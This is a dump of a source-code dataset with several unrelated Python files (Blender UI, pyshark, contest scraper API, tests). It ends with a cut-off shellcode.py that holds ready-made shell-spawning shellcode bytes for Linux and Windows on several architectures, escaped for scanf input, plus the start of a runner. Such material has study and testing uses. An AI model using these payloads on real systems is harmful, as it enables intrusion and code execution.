repo_name
stringlengths 5
92
| path
stringlengths 4
232
| copies
stringclasses 19
values | size
stringlengths 4
7
| content
stringlengths 721
1.04M
| license
stringclasses 15
values | hash
int64 -9,223,277,421,539,062,000
9,223,102,107B
| line_mean
float64 6.51
99.9
| line_max
int64 15
997
| alpha_frac
float64 0.25
0.97
| autogenerated
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|
AO-StreetArt/BlenderSync | src/ui/obj_mgmt_ui.py | 1 | 1552 | '''
Copyright (C) 2018 Alex Barry
[email protected]
Created by Alex Barry
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import bpy
# Object Panel
class VIEW_3D_PT_AeselObjectPanel(bpy.types.Panel):
"""Creates an Aesel Object UI Panel"""
bl_label = "Aesel Objects"
bl_idname = "VIEW_3D_PT_aesel_obj_ui"
bl_space_type = 'VIEW_3D'
bl_region_type = 'UI'
bl_category = 'Aesel'
def draw(self, context):
layout = self.layout
row = layout.row()
row.operator("object.create_aesel_object")
row = layout.row()
row.operator("object.delete_aesel_object")
row = layout.row()
row.operator("object.lock_aesel_object")
row = layout.row()
row.operator("object.unlock_aesel_object")
row = layout.row()
row.prop(context.scene, 'aesel_auto_updates')
row = layout.row()
row.prop(context.scene, 'aesel_listen_for_updates')
| gpl-3.0 | 3,091,828,068,023,817,000 | 33.488889 | 73 | 0.671392 | false |
lightnarcissus/AnimalNet | browser/Python site-packages/pyshark/packet/layer.py | 1 | 8658 | import os
import binascii
import py
from pyshark.packet.common import Pickleable
class LayerField(object):
"""
Holds all data about a field of a layer, both its actual value and its name and nice representation.
"""
# Note: We use this object with slots and not just a dict because
# it's much more memory-efficient (cuts about a third of the memory).
__slots__ = ['name', 'showname', 'raw_value', 'show', 'hide', 'pos', 'size', 'unmaskedvalue']
def __init__(self, name=None, showname=None, value=None, show=None, hide=None, pos=None, size=None, unmaskedvalue=None):
self.name = name
self.showname = showname
self.raw_value = value
self.show = show
self.pos = pos
self.size = size
self.unmaskedvalue = unmaskedvalue
if hide and hide == 'yes':
self.hide = True
else:
self.hide = False
def __repr__(self):
return '<LayerField %s: %s>' % (self.name, self.get_default_value())
def get_default_value(self):
"""
Gets the best 'value' string this field has.
"""
val = self.show
if not val:
val = self.raw_value
if not val:
val = self.showname
return val
@property
def showname_value(self):
"""
For fields which do not contain a normal value, we attempt to take their value from the showname.
"""
if self.showname and ': ' in self.showname:
return self.showname.split(': ')[1]
@property
def showname_key(self):
if self.showname and ': ' in self.showname:
return self.showname.split(': ')[0]
def __getstate__(self):
ret = {}
for slot in self.__slots__:
ret[slot] = getattr(self, slot)
return ret
def __setstate__(self, data):
for key, val in data.iteritems():
setattr(self, key, val)
@property
def binary_value(self):
"""
Returns the raw value of this field (as a binary string)
"""
return binascii.unhexlify(self.raw_value)
@property
def int_value(self):
"""
Returns the raw value of this field (as an integer).
"""
return int(self.raw_value, 16)
class LayerFieldsContainer(str, Pickleable):
"""
An object which contains one or more fields (of the same name).
When accessing member, such as showname, raw_value, etc. the appropriate member of the main (first) field saved
in this container will be shown.
"""
def __new__(cls, main_field, *args, **kwargs):
obj = str.__new__(cls, main_field.get_default_value(), *args, **kwargs)
obj.fields = [main_field]
return obj
def add_field(self, field):
self.fields.append(field)
@property
def main_field(self):
return self.fields[0]
@property
def alternate_fields(self):
"""
Return the alternate values of this field containers (non-main ones).
"""
return self.fields[1:]
@property
def all_fields(self):
"""
Returns all fields in a list, the main field followed by the alternate fields.
"""
return self.fields
def __getattr__(self, item):
return getattr(self.main_field, item)
class Layer(Pickleable):
"""
An object representing a Packet layer.
"""
DATA_LAYER = 'data'
def __init__(self, xml_obj=None, raw_mode=False):
self.raw_mode = raw_mode
self._layer_name = xml_obj.attrib['name']
self._all_fields = {}
# We copy over all the fields from the XML object
# Note: we don't read lazily from the XML because the lxml objects are very memory-inefficient
# so we'd rather not save them.
for field in xml_obj.findall('.//field'):
attributes = dict(field.attrib)
field_obj = LayerField(**attributes)
if attributes['name'] in self._all_fields:
# Field name already exists, add this field to the container.
self._all_fields[attributes['name']].add_field(field_obj)
else:
self._all_fields[attributes['name']] = LayerFieldsContainer(field_obj)
def __getattr__(self, item):
val = self.get_field(item)
if val is None:
raise AttributeError()
if self.raw_mode:
return val.raw_value
return val
def __dir__(self):
return dir(type(self)) + self.__dict__.keys() + self.field_names
def get_field(self, name):
"""
Gets the XML field object of the given name.
"""
for field_name, field in self._all_fields.items():
if self._sanitize_field_name(name) == self._sanitize_field_name(field_name):
return field
def get_field_value(self, name, raw=False):
"""
Tries getting the value of the given field.
Tries it in the following order: show (standard nice display), value (raw value), showname (extended nice display).
:param name: The name of the field
:param raw: Only return raw value
:return: str of value
"""
field = self.get_field(name)
if field is None:
return
if raw:
return field.raw_value
return field
@property
def _field_prefix(self):
"""
Prefix to field names in the XML.
"""
if self.layer_name == 'geninfo':
return ''
return self.layer_name + '.'
@property
def field_names(self):
"""
Gets all XML field names of this layer.
:return: list of strings
"""
return [self._sanitize_field_name(field_name)
for field_name in self._all_fields]
@property
def layer_name(self):
if self._layer_name == 'fake-field-wrapper':
return self.DATA_LAYER
return self._layer_name
def _sanitize_field_name(self, field_name):
"""
Sanitizes an XML field name (since it might have characters which would make it inaccessible as a python attribute).
"""
field_name = field_name.replace(self._field_prefix, '')
return field_name.replace('.', '_').replace('-', '_').lower()
def __repr__(self):
return '<%s Layer>' % self.layer_name.upper()
def __str__(self):
if self.layer_name == self.DATA_LAYER:
return 'DATA'
s = 'Layer %s:' % self.layer_name.upper() + os.linesep
for field_line in self._get_all_field_lines():
s += field_line
return s
def pretty_print(self):
tw = py.io.TerminalWriter()
if self.layer_name == self.DATA_LAYER:
tw.write('DATA')
return
tw.write('Layer %s:' % self.layer_name.upper() + os.linesep, yellow=True, bold=True)
for field_line in self._get_all_field_lines():
if ':' in field_line:
field_name, field_line = field_line.split(':', 1)
tw.write(field_name + ':', green=True, bold=True)
tw.write(field_line, bold=True)
def _get_all_fields_with_alternates(self):
all_fields = self._all_fields.values()
all_fields += sum([field.alternate_fields for field in all_fields], [])
return all_fields
def _get_all_field_lines(self):
"""
Returns all lines that represent the fields of the layer (both their names and values).
"""
for field in self._get_all_fields_with_alternates():
if field.hide:
continue
if field.showname:
field_repr = field.showname
elif field.show:
field_repr = field.show
else:
continue
yield '\t' + field_repr + os.linesep
def get_field_by_showname(self, showname):
"""
Gets a field by its "showname"
(the name that appears in Wireshark's detailed display i.e. in 'User-Agent: Mozilla...', 'User-Agent' is the
showname)
Returns None if not found.
"""
for field in self._get_all_fields_with_alternates():
if field.showname_key == showname:
# Return it if "XXX: whatever == XXX"
return field
| apache-2.0 | -1,271,595,539,323,519,700 | 30.548872 | 124 | 0.548741 | false |
torquecoder/CPContest-API | contest_api.py | 1 | 7795 | #!/usr/bin/env python3
from flask import Flask, request
from flask_restful import Resource, Api
from bs4 import BeautifulSoup
import requests
from time import strptime,strftime,mktime,gmtime,localtime
import json
import os
app = Flask(__name__)
api = Api(app)
result = []
resultSet = {"present_contests":[],"upcoming_contests":[]}
def get_duration(duration):
days = duration/(60*24)
duration %= 60*24
hours = duration/60
duration %= 60
minutes = duration
ans=""
if days==1: ans+=str(days)+" day "
elif days!=0: ans+=str(days)+" days "
if hours!=0:ans+=str(hours)+"h "
if minutes!=0:ans+=str(minutes)+"m"
return ans.strip()
# CodeChef Contest Fetching
page = requests.get("http://www.codechef.com/contests").text
soup = BeautifulSoup(page, "html.parser")
statusdiv = soup.findAll("table", attrs = {"class": "dataTable"})
headings = soup.findAll("h3")
contest_tables = {"Future Contests": [], "Present Contests": []}
for i in range(len(headings)):
if headings[i].text != "Past Contests":
contest_tables[headings[i].text] = statusdiv[i].findAll("tr")[1:]
for upcoming_contest in contest_tables["Future Contests"]:
details = upcoming_contest.findAll("td")
start_time = strptime(details[2].text, "%d %b %Y %H:%M:%S")
end_time = strptime(details[3].text, "%d %b %Y %H:%M:%S")
duration = get_duration(int((mktime(end_time) - mktime(start_time)) / 60))
resultSet["upcoming_contests"].append({"Name": details[1].text,
"url": "http://www.codechef.com" + details[1].a["href"],
"StartTime": strftime("%a, %d %b %Y %H:%M", start_time),
"EndTime": strftime("%a, %d %b %Y %H:%M", end_time),
"Duration": duration,
"Platform": "CODECHEF"})
for present_contest in contest_tables["Present Contests"]:
details = present_contest.findAll("td")
end_time = strptime(details[3].text, "%d %b %Y %H:%M:%S")
resultSet["present_contests"].append({"Name": details[1].text,
"url": "http://www.codechef.com" + details[1].a["href"],
"EndTime": strftime("%a, %d %b %Y %H:%M", end_time),
"Platform": "CODECHEF"})
# HackerEarth Contest Fetching
cur_time = localtime()
ref_date = strftime("%Y-%m-%d", localtime(mktime(localtime()) - 432000))
duplicate_check=[]
page = requests.get("https://www.hackerearth.com/chrome-extension/events/")
data = page.json()["response"]
for item in data:
start_time = strptime(item["start_tz"].strip()[:19], "%Y-%m-%d %H:%M:%S")
end_time = strptime(item["end_tz"].strip()[:19], "%Y-%m-%d %H:%M:%S")
duration = get_duration(int(( mktime(end_time)-mktime(start_time) )/60 ))
duplicate_check.append(item["title"].strip())
if item["challenge_type"]=='hiring':challenge_type = 'hiring'
else: challenge_type = 'contest'
if item["status"].strip()=="UPCOMING":
resultSet["upcoming_contests"].append({ "Name" : item["title"].strip() , "url" : item["url"].strip() , "StartTime" : strftime("%a, %d %b %Y %H:%M", start_time),"EndTime" : strftime("%a, %d %b %Y %H:%M", end_time),"Duration":duration,"Platform":"HACKEREARTH","challenge_type": challenge_type })
elif item["status"].strip()=="ONGOING":
resultSet["present_contests"].append({ "Name" : item["title"].strip() , "url" : item["url"].strip() , "EndTime" : strftime("%a, %d %b %Y %H:%M", end_time),"Platform":"HACKEREARTH","challenge_type": challenge_type })
# CodeForces Contest Fetching
page = requests.get("http://codeforces.com/api/contest.list")
data = page.json()["result"]
for item in data:
if item["phase"]=="FINISHED": break
start_time = strftime("%a, %d %b %Y %H:%M",gmtime(item["startTimeSeconds"]+19800))
end_time = strftime("%a, %d %b %Y %H:%M",gmtime(item["durationSeconds"]+item["startTimeSeconds"]+19800))
duration = get_duration( item["durationSeconds"]/60 )
if item["phase"].strip()=="BEFORE":
resultSet["upcoming_contests"].append({ "Name" : item["name"] , "url" : "http://codeforces.com/contest/"+str(item["id"]) , "StartTime" : start_time,"EndTime" : end_time,"Duration":duration,"Platform":"CODEFORCES" })
else:
resultSet["present_contests"].append({ "Name" : item["name"] , "url" : "http://codeforces.com/contest/"+str(item["id"]) , "EndTime" : end_time ,"Platform":"CODEFORCES" })
# HackerRank Contest Fetching
hackerrank_contests = {"urls":[]}
cur_time = str(int(mktime(localtime())*1000))
page = requests.get("https://www.hackerrank.com/rest/contests/upcoming?offset=0&limit=10&contest_slug=active&_="+cur_time)
data = page.json()["models"]
for item in data:
if not item["ended"] and ("https://www.hackerrank.com/"+item["slug"]) not in hackerrank_contests["urls"]:
start_time = strptime(item["get_starttimeiso"], "%Y-%m-%dT%H:%M:%SZ")
end_time = strptime(item["get_endtimeiso"], "%Y-%m-%dT%H:%M:%SZ")
duration = get_duration(int(( mktime(end_time)-mktime(start_time) )/60 ))
if not item["started"]:
hackerrank_contests["urls"].append("https://www.hackerrank.com/"+item["slug"])
resultSet["upcoming_contests"].append({ "Name" : item["name"] , "url" : "https://www.hackerrank.com/"+item["slug"] , "StartTime" : strftime("%a, %d %b %Y %H:%M", localtime(mktime(start_time)+19800)),"EndTime" : strftime("%a, %d %b %Y %H:%M", localtime(mktime(end_time)+19800)),"Duration":duration,"Platform":"HACKERRANK" })
elif item["started"]:
hackerrank_contests["urls"].append("https://www.hackerrank.com/"+item["slug"])
resultSet["present_contests"].append({ "Name" : item["name"] , "url" : "https://www.hackerrank.com/"+item["slug"] , "EndTime" : strftime("%a, %d %b %Y %H:%M", localtime(mktime(end_time)+19800)) ,"Platform":"HACKERRANK" })
cur_time = str(int(mktime(localtime())*1000))
page = requests.get("https://www.hackerrank.com/rest/contests/college?offset=0&limit=50&_="+cur_time)
data = page.json()["models"]
for item in data:
if not item["ended"] and ("https://www.hackerrank.com/"+item["slug"]) not in hackerrank_contests["urls"]:
start_time = strptime(item["get_starttimeiso"], "%Y-%m-%dT%H:%M:%SZ")
end_time = strptime(item["get_endtimeiso"], "%Y-%m-%dT%H:%M:%SZ")
duration = get_duration(int(( mktime(end_time)-mktime(start_time) )/60 ))
if not item["started"]:
hackerrank_contests["urls"].append("https://www.hackerrank.com/"+item["slug"])
resultSet["upcoming_contests"].append({ "Name" : item["name"] , "url" : "https://www.hackerrank.com/"+item["slug"] , "StartTime" : strftime("%a, %d %b %Y %H:%M", localtime(mktime(start_time)+19800)),"EndTime" : strftime("%a, %d %b %Y %H:%M", localtime(mktime(end_time)+19800)),"Duration":duration,"Platform":"HACKERRANK" })
elif item["started"]:
hackerrank_contests["urls"].append("https://www.hackerrank.com/"+item["slug"])
resultSet["present_contests"].append({ "Name" : item["name"] , "url" : "https://www.hackerrank.com/"+item["slug"] , "EndTime" : strftime("%a, %d %b %Y %H:%M", localtime(mktime(end_time)+19800)) ,"Platform":"HACKERRANK" })
resultSet["upcoming_contests"] = sorted(resultSet["upcoming_contests"], key=lambda k: strptime(k['StartTime'], "%a, %d %b %Y %H:%M"))
resultSet["present_contests"] = sorted(resultSet["present_contests"], key=lambda k: strptime(k['EndTime'], "%a, %d %b %Y %H:%M"))
class TodoSimple(Resource):
def get(self):
return {"result": resultSet}
api.add_resource(TodoSimple, '/')
port = int(os.environ.get("PORT", 5000))
app.run(host='0.0.0.0', port=port)
| mit | -1,658,458,333,064,891,100 | 47.71875 | 338 | 0.612572 | false |
linkhub-sdk/popbill.statement.example.py | deleteFile.py | 1 | 1667 | # -*- coding: utf-8 -*-
# code for console Encoding difference. Dont' mind on it
import sys
import imp
imp.reload(sys)
try:
sys.setdefaultencoding('UTF8')
except Exception as E:
pass
import testValue
from popbill import StatementService, PopbillException
statementService = StatementService(testValue.LinkID, testValue.SecretKey)
statementService.IsTest = testValue.IsTest
statementService.IPRestrictOnOff = testValue.IPRestrictOnOff
statementService.UseStaticIP = testValue.UseStaticIP
statementService.UseLocalTimeYN = testValue.UseLocalTimeYN
'''
전자명세서에 첨부된 파일을 삭제합니다.
- 파일을 식별하는 파일아이디는 첨부파일 목록(GetFileList API) 의 응답항목
중 파일아이디(AttachedFile) 값을 통해 확인할 수 있습니다.
- https://docs.popbill.com/statement/python/api#DeleteFile
'''
try:
print("=" * 15 + " 전자명세서 첨부파일 삭제 " + "=" * 15)
# 팝빌회원 사업자번호
CorpNum = testValue.testCorpNum
# 명세서 코드, 121-명세서, 122-청구서, 123-견적서, 124-발주서, 125-입금표, 126-영수증
ItemCode = 121
# 전자명세서 문서번호
MgtKey = "20210429-001"
# 삭제할 FileID, 첨부파일목록(getFiles API) 응답 전문의 attachedFile 값
FileID = "4DB71521-DC61-43EB-A061-DB0987ABACAB.PBF"
# 팝빌회원 아이디
UserID = testValue.testUserID
result = statementService.deleteFile(CorpNum, ItemCode, MgtKey, FileID, UserID)
print("처리결과 : [%d] %s" % (result.code, result.message))
except PopbillException as PE:
print("Exception Occur : [%d] %s" % (PE.code, PE.message))
| mit | -3,472,569,565,934,008,300 | 25.788462 | 83 | 0.719311 | false |
fsimkovic/conkit | conkit/io/tests/test_clustal.py | 1 | 4305 | """Testing facility for conkit.io.FastaIO"""
__author__ = "Felix Simkovic"
__date__ = "09 Sep 2016"
import os
import unittest
from conkit.io.clustal import ClustalParser
from conkit.io._iotools import create_tmp_f
class TestClustalParser(unittest.TestCase):
def test_read_1(self):
seq = """CLUSTAL W
seq_0 MLDLEVVPE-RSLGNEQW-------E-F-TLG-MPLAQAV-AILQKHC--
seq_0 -RIIKNVQV
"""
f_name = create_tmp_f(content=seq)
parser = ClustalParser()
with open(f_name, 'r') as f_in:
sequence_file = parser.read(f_in)
sequence_entry = sequence_file.top_sequence
ref_id = "seq_0"
self.assertEqual(ref_id, sequence_entry.id)
ref_seq = "MLDLEVVPE-RSLGNEQW-------E-F-TLG-MPLAQAV-AILQKHC---RIIKNVQV"
self.assertEqual(ref_seq, sequence_entry.seq)
os.unlink(f_name)
def test_read_2(self):
msa = """CLUSTAL W
seq_0 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
seq_1 BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
seq_2 CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
**************************************************
seq_0 AAAAAAAAA
seq_1 BBBBBBBBB
seq_2 CCCCCCCCC
*********
"""
f_name = create_tmp_f(content=msa)
parser = ClustalParser()
with open(f_name, 'r') as f_in:
sequence_file = parser.read(f_in)
for i, sequence_entry in enumerate(sequence_file):
if i == 0:
self.assertEqual('seq_0', sequence_entry.id)
self.assertEqual('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA', sequence_entry.seq)
elif i == 1:
self.assertEqual('seq_1', sequence_entry.id)
self.assertEqual('BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB', sequence_entry.seq)
elif i == 2:
self.assertEqual('seq_2', sequence_entry.id)
self.assertEqual('CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC', sequence_entry.seq)
os.unlink(f_name)
def test_read_3(self):
msa = """CLUSTAL FORMAT for
seq_0 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
seq_1 BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
seq_2 CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
seq_0 AAAAAAAAA
seq_1 BBBBBBBBB
seq_2 CCCCCCCCC
"""
f_name = create_tmp_f(content=msa)
parser = ClustalParser()
with open(f_name, 'r') as f_in:
sequence_file = parser.read(f_in)
for i, sequence_entry in enumerate(sequence_file):
if i == 0:
self.assertEqual('seq_0', sequence_entry.id)
self.assertEqual('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA', sequence_entry.seq)
elif i == 1:
self.assertEqual('seq_1', sequence_entry.id)
self.assertEqual('BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB', sequence_entry.seq)
elif i == 2:
self.assertEqual('seq_2', sequence_entry.id)
self.assertEqual('CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC', sequence_entry.seq)
os.unlink(f_name)
def test_write_1(self):
seq = [
"CLUSTAL FORMAT written with ConKit",
"",
"seq_0\tAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
"seq_1\tBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB",
""
"seq_0\tAAAAAAAAAAAAAAAAAAAAAA",
"seq_1\tBBBBBBBBBBBBBBBBBBBBBB",
]
joinedseq = '\n'.join(seq)
f_name_in = create_tmp_f(content=joinedseq)
f_name_out = create_tmp_f()
parser = ClustalParser()
with open(f_name_in, 'r') as f_in, open(f_name_out, 'w') as f_out:
sequence_file = parser.read(f_in)
parser.write(f_out, sequence_file)
with open(f_name_out, 'r') as f_in:
output = f_in.read().splitlines()
self.assertEqual(seq, output)
map(os.unlink, [f_name_in, f_name_out])
if __name__ == "__main__":
unittest.main(verbosity=2)
| bsd-3-clause | 4,883,339,541,631,436,000 | 36.763158 | 115 | 0.605575 | false |
sc3/cookcountyjail | tests/scraper/test_http.py | 1 | 2309 |
import httpretty
from random import randint
from scraper.http import Http, COOK_COUNTY_JAIL_INMATE_DETAILS_URL, BAD_URL_NETWORK_PROBLEM
INMATE_URL = COOK_COUNTY_JAIL_INMATE_DETAILS_URL + '2014-0118034'
class Test_Http:
@httpretty.activate
def test_get_succeeds(self):
number_of_attempts = 2
expected_text = 'it worked'
ccj_api_requests = {'succeed-attempt': randint(1, number_of_attempts), 'current-attempt': 0}
def fulfill_ccj_api_request(_, uri, headers):
assert uri == INMATE_URL
ccj_api_requests['current-attempt'] += 1
if ccj_api_requests['current-attempt'] == ccj_api_requests['succeed-attempt']:
return 200, headers, expected_text
return 500, headers, 'did not work'
httpretty.register_uri(httpretty.GET, COOK_COUNTY_JAIL_INMATE_DETAILS_URL,
body=fulfill_ccj_api_request)
http = Http()
okay, fetched_contents = http.get(INMATE_URL, number_of_attempts)
assert okay
assert ccj_api_requests['current-attempt'] == ccj_api_requests['succeed-attempt']
assert fetched_contents == expected_text
@httpretty.activate
def test_get_fails_500(self):
number_of_attempts = 2
expected_text = 'did not work'
ccj_api_requests = {'succeed-attempt': number_of_attempts, 'current-attempt': 0}
def fulfill_ccj_api_request(_, uri, headers):
assert uri == INMATE_URL
ccj_api_requests['current-attempt'] += 1
return 500, headers, expected_text
httpretty.register_uri(httpretty.GET, COOK_COUNTY_JAIL_INMATE_DETAILS_URL,
body=fulfill_ccj_api_request)
http = Http()
okay, fetched_contents = http.get(INMATE_URL, number_of_attempts)
assert not okay
assert ccj_api_requests['current-attempt'] == ccj_api_requests['succeed-attempt']
assert fetched_contents['status-code'] == 500
def test_get_fails_no_such_place(self):
inmate_url = 'http://idbvf3ruvfr3ubububufvubeuvdvd2uvuevvgud2bewhde.duucuvcryvgrfvyv'
http = Http()
okay, fetched_contents = http.get(inmate_url)
assert not okay
assert fetched_contents == BAD_URL_NETWORK_PROBLEM
| gpl-3.0 | -4,212,042,254,834,498,000 | 35.078125 | 100 | 0.633175 | false |
mhrivnak/pulp_docker | plugins/pulp_docker/plugins/distributors/metadata.py | 4 | 3684 | import logging
import os
from pulp.server.compat import json
from pulp.plugins.util.metadata_writer import JSONArrayFileContext
from pulp_docker.common import constants
from pulp_docker.plugins.distributors import configuration
_LOG = logging.getLogger(__name__)
class RedirectFileContext(JSONArrayFileContext):
"""
Context manager for generating the docker images file.
"""
def __init__(self, working_dir, conduit, config, repo):
"""
:param working_dir: working directory to create the filelists.xml.gz in
:type working_dir: str
:param conduit: The conduit to get api calls
:type conduit: pulp.plugins.conduits.repo_publish.RepoPublishConduit
:param config: Pulp configuration for the distributor
:type config: pulp.plugins.config.PluginCallConfiguration
:param repo: Pulp managed repository
:type repo: pulp.plugins.model.Repository
"""
self.repo_id = repo.id
metadata_file_path = os.path.join(working_dir,
configuration.get_redirect_file_name(repo))
super(RedirectFileContext, self).__init__(metadata_file_path)
scratchpad = conduit.get_repo_scratchpad()
tag_list = scratchpad.get(u'tags', [])
self.tags = self.convert_tag_list_to_dict(tag_list)
self.registry = configuration.get_repo_registry_id(repo, config)
self.redirect_url = configuration.get_redirect_url(config, repo)
if config.get('protected', False):
self.protected = "true"
else:
self.protected = "false"
def _write_file_header(self):
"""
Write out the beginning of the json file
"""
self.metadata_file_handle.write('{"type":"pulp-docker-redirect","version":1,'
'"repository":"%s","repo-registry-id": "%s",'
'"url":"%s","protected":%s,"images":[' %
(self.repo_id, self.registry, self.redirect_url,
self.protected))
def _write_file_footer(self):
"""
Write out the end of the json file
"""
self.metadata_file_handle.write('],"tags":')
self.metadata_file_handle.write(json.dumps(self.tags))
self.metadata_file_handle.write('}')
def add_unit_metadata(self, unit):
"""
Add the specific metadata for this unit
:param unit: The docker unit to add to the images metadata file
:type unit: pulp.plugins.model.AssociatedUnit
"""
super(RedirectFileContext, self).add_unit_metadata(unit)
image_id = unit.unit_key['image_id']
unit_data = {
'id': image_id
}
string_representation = json.dumps(unit_data)
self.metadata_file_handle.write(string_representation)
def convert_tag_list_to_dict(self, tag_list):
"""
Convert a list of tags to a dictionary with tag as the key and image id as value.
If a single tag is associated with multiple image_ids, they will be overwritten.
Since we make sure this doesn't happen when adding image tags to a repository,
we can safely do the conversion.
:param tag_list: list of dictionaries each containing values for 'tag' and 'image_id' keys
:type tag_list: list of dict
:return: dictionary of tag:image_id
:rtype: dict
"""
tag_dict = {}
for tag in tag_list:
tag_dict[tag[constants.IMAGE_TAG_KEY]] = tag[constants.IMAGE_ID_KEY]
return tag_dict
| gpl-2.0 | 809,476,770,697,796,400 | 36.979381 | 99 | 0.60342 | false |
fishilico/shared | shellcode/shellcode.py | 1 | 8969 | #!/usr/bin/env python
# -*- coding:UTF-8 -*-
# Copyright (c) 2015 Nicolas Iooss
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
"""Print or run a shellcode according to the OS currently running
@author: Nicolas Iooss
@license: MIT
"""
import argparse
import ctypes
import ctypes.util
import platform
import re
import sys
# These shellcodes pass scanf constraints (no \n, \0 nor space)
SHELLCODES = {
# 48 bytes
'Linux.arm64':
b'b\x01\x0b\xca\xe3E\x8c\xd2#\xcd\xad\xf2\xe3\xe5\xc5\xf2c\x0e\xed' +
b'\xf2\xe3\x0b\xbf\xa9\xe333\x91`03\xd1ap3\xd1\xe0\x0b\xbf\xa9\xa8' +
b'\x1b\x80\xd2a@\x1b\xd4',
# 36 bytes
'Linux.arm_l':
b"\x01@\x8f\xe2\x14\xff/\xe1hF\x0c8R@\x03K\x03Lm@=\xb4iF\x0b'\x0b" +
b'\xdf/bin//sh',
# 24 bytes
'Linux.x86_32':
b'1\xd2Rh//shh/bin\x89\xe3RS\x89\xe1j\x0bX\xcd\x80',
# 25 bytes
'Linux.x86_64':
b'1\xc0\x99RH\xbb/bin//shST_RWT^\xb0;\x0f\x05',
# 194 bytes
'Windows.x86_32':
b'\xfc\xebv`1\xc0d\x8b@0\x8b@\x0c\x8bX\x0c\x89\xde\xad\x89\xc3\x8bp0' +
b'\xac$\xdf<Ku\xf1\x8bk\x18\x8bE<\x8b\\\x05x\x8d\\\x1d\xf0\x8bK(\x8b' +
b'{0\x01\xef\xe3\xfeI\x8b4\x8f\x01\xee1\xc0\x99\xac\x84\xc0t\x140' +
b'\xc2\xb0\x08\xd1\xeas\x06\x81\xf2x;\xf6\x82\xfe\xc8u\xf2\xeb\xe7;T' +
b'$\x1cu\xd6\x8bs4\x01\xee\x0f\xb7\x04N\x8bs,\x01\xee\x8b\x04\x86' +
b'\x01\xe8\x89D$\x1caP\xc3h\x01cmdjPY)\xcc\x89\xe71\xc0\xf3\xaa\xc1/' +
b'\x08jD\x8dt$D\x89\xe2VRQQj\x10j\x01QQWQ\xb8$\x05\x1az\xe8Y\xff\xff' +
b'\xffj\xff\xadP\xb8vQ\x94\xd8\xe8K\xff\xff\xff1\xc9Q\xb8\xd5\xa5' +
b'\xc9B\xeb\xf1',
# 215 bytes
'Windows.x86_64':
b'\xfc\xeb~UQRVW1\xc0eH\x8b@`H\x8b@\x18H\x8bp\x10H\x8b6H\xadH\x8bh0' +
b'\x8bu<\x83\xc6@\x8bT5HH\x8dT\x15\xff\x8bJ\x19\x8bz!RH\x01\xef\xff' +
b'\xc9x\xfe\x8b4\x8fH\x01\xee1\xc0\x99\xac\x84\xc0t\x140\xc2\xb0\x08' +
b'\xd1\xeas\x06\x81\xf2x;\xf6\x82\xfe\xc8u\xf2\xeb\xe79\xdau\xd6Z' +
b'\x8bz%H\x01\xef\x0f\xb7\x04O\x8br\x1dH\x01\xee\x8b\x04\x86H\x01' +
b'\xe8_^ZY]\xff\xe0h\x01cmdTZ\xc1*\x08H\x83\xe4\xf01\xc9\xb1\x88H)' +
b'\xccT_1\xc0\xf3\xaaH\x83\xef\x18AXAYjhT^WVQQj\x10j\x01QQQQ\xbb$' +
b'\x05\x1az\xe8E\xff\xff\xffj\xffZH\x8b\x0f\xbbvQ\x94\xd8\xe85\xff' +
b'\xff\xff1\xc9\xbb\xd5\xa5\xc9B\xeb\xf2',
}
def normalize_arch(arch):
"""Normalize the name of an architecture"""
arch = arch.lower()
if arch == 'arm' or re.match(r'^arm(v[1-9]+)?l$', arch):
return 'arm_l'
if arch == 'aarch64':
return 'arm64'
if re.match(r'^i[3-6]86$', arch) or arch in ('x86', 'x86-32'):
return 'x86_32'
if arch in ('amd64', 'x86-64'):
return 'x86_64'
return arch
def run_code_linux(shellcode):
"""Run the specified shellcode on Linux"""
# Find functions in libc
libc = ctypes.CDLL(ctypes.util.find_library('c'))
libc.mmap.restype = ctypes.c_void_p
